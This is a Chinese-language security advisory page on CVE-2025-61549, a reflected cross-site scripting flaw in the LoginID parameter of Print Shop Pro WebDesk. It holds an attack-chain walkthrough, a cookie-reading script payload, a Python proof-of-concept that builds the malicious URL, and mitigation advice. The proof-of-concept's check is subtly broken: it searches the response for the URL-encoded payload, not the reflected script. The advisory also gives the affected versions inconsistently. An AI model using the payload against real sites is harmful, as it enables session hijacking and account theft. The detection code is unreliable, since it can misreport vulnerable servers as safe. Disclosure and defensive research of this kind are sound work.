CVE-2025-61549 Print Shop Pro WebDesk LoginID参数XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61549

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

edu Business Solutions Print Shop Pro WebDesk

漏洞概述

CVE-2025-61549是edu Business Solutions公司开发的Print Shop Pro WebDesk产品中的一个中等严重性跨站脚本(XSS)漏洞。该漏洞存在于Web应用程序的注册页面端点/PSP/app/web/reg/reg_display.asp中，问题出在LoginID参数未对用户输入进行适当的HTML编码或转义处理。攻击者可以通过在LoginID参数中注入恶意JavaScript代码，当其他用户访问包含该恶意输入的页面时，脚本将在受害者浏览器中执行。这允许攻击者窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面显示内容。由于该漏洞需要用户交互触发，CVSS评分定为6.1，属于中等严重级别。该漏洞影响18.34版本，厂商已在19.76版本中修复此问题。

技术细节

该漏洞是典型的反射型XSS(Reflected Cross-Site Scripting)漏洞。在Print Shop Pro WebDesk的注册显示页面reg_display.asp中，应用程序直接将从LoginID参数接收的用户输入反射回HTTP响应，而未进行任何输入验证或输出编码。攻击者构造包含JavaScript代码的恶意URL，例如在LoginID参数中注入<script>alert(document.cookie)</script>。当受害者点击该恶意链接或访问包含该参数的页面时，服务器将未经过滤的输入作为响应的一部分返回，浏览器将其解析为可执行脚本并在当前页面上下文中执行。攻击者可利用此漏洞获取受害者的认证令牌、会话ID或其他敏感信息，进而冒充合法用户进行操作。由于攻击通过社会工程学手段诱导用户访问恶意链接，实际利用需要一定的用户交互。

攻击链分析

STEP 1

步骤1

攻击者识别目标Print Shop Pro WebDesk 18.34版本的注册页面端点/PSP/app/web/reg/reg_display.asp

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的LoginID参数，如<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱导目标用户访问构造的恶意URL

STEP 4

步骤4

目标用户点击链接后，浏览器向服务器发送请求，服务器将未过滤的LoginID参数反射回HTTP响应

STEP 5

步骤5

浏览器解析响应时将反射的脚本标签作为可执行JavaScript执行，攻击者借此窃取用户Cookie或会话信息

STEP 6

步骤6

攻击者利用窃取的会话信息劫持用户账户，执行未经授权的操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
from urllib.parse import quote

# CVE-2025-61549 PoC - Reflected XSS in Print Shop Pro WebDesk
# Target URL with vulnerable endpoint
base_url = "http://target-server.com"
vulnerable_endpoint = "/PSP/app/web/reg/reg_display.asp"

# Malicious JavaScript payload for XSS
exploit_payload = "<script>alert(document.cookie)</script>"
encoded_payload = quote(exploit_payload)

# Construct malicious URL
malicious_url = f"{base_url}{vulnerable_endpoint}?LoginID={encoded_payload}"

print(f"[*] Generating CVE-2025-61549 PoC")
print(f"[*] Target: {base_url}")
print(f"[*] Vulnerable Endpoint: {vulnerable_endpoint}")
print(f"[*] Malicious URL:")
print(malicious_url)

# Send request to verify vulnerability
try:
    response = requests.get(malicious_url, timeout=10)
    if encoded_payload in response.text:
        print("[+] VULNERABLE: Payload reflected without sanitization")
    else:
        print("[-] Not vulnerable or payload filtered")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

Print Shop Pro WebDesk 18.34及之前版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1)在前端部署WAF(Web应用防火墙)规则过滤<script>等危险标签；2)对URL参数进行URL编码验证，拒绝异常字符；3)启用浏览器的XSS过滤器作为辅助防护；4)限制注册页面的访问频率防止自动化攻击。但最根本的解决方案仍是升级到厂商发布的安全版本19.76。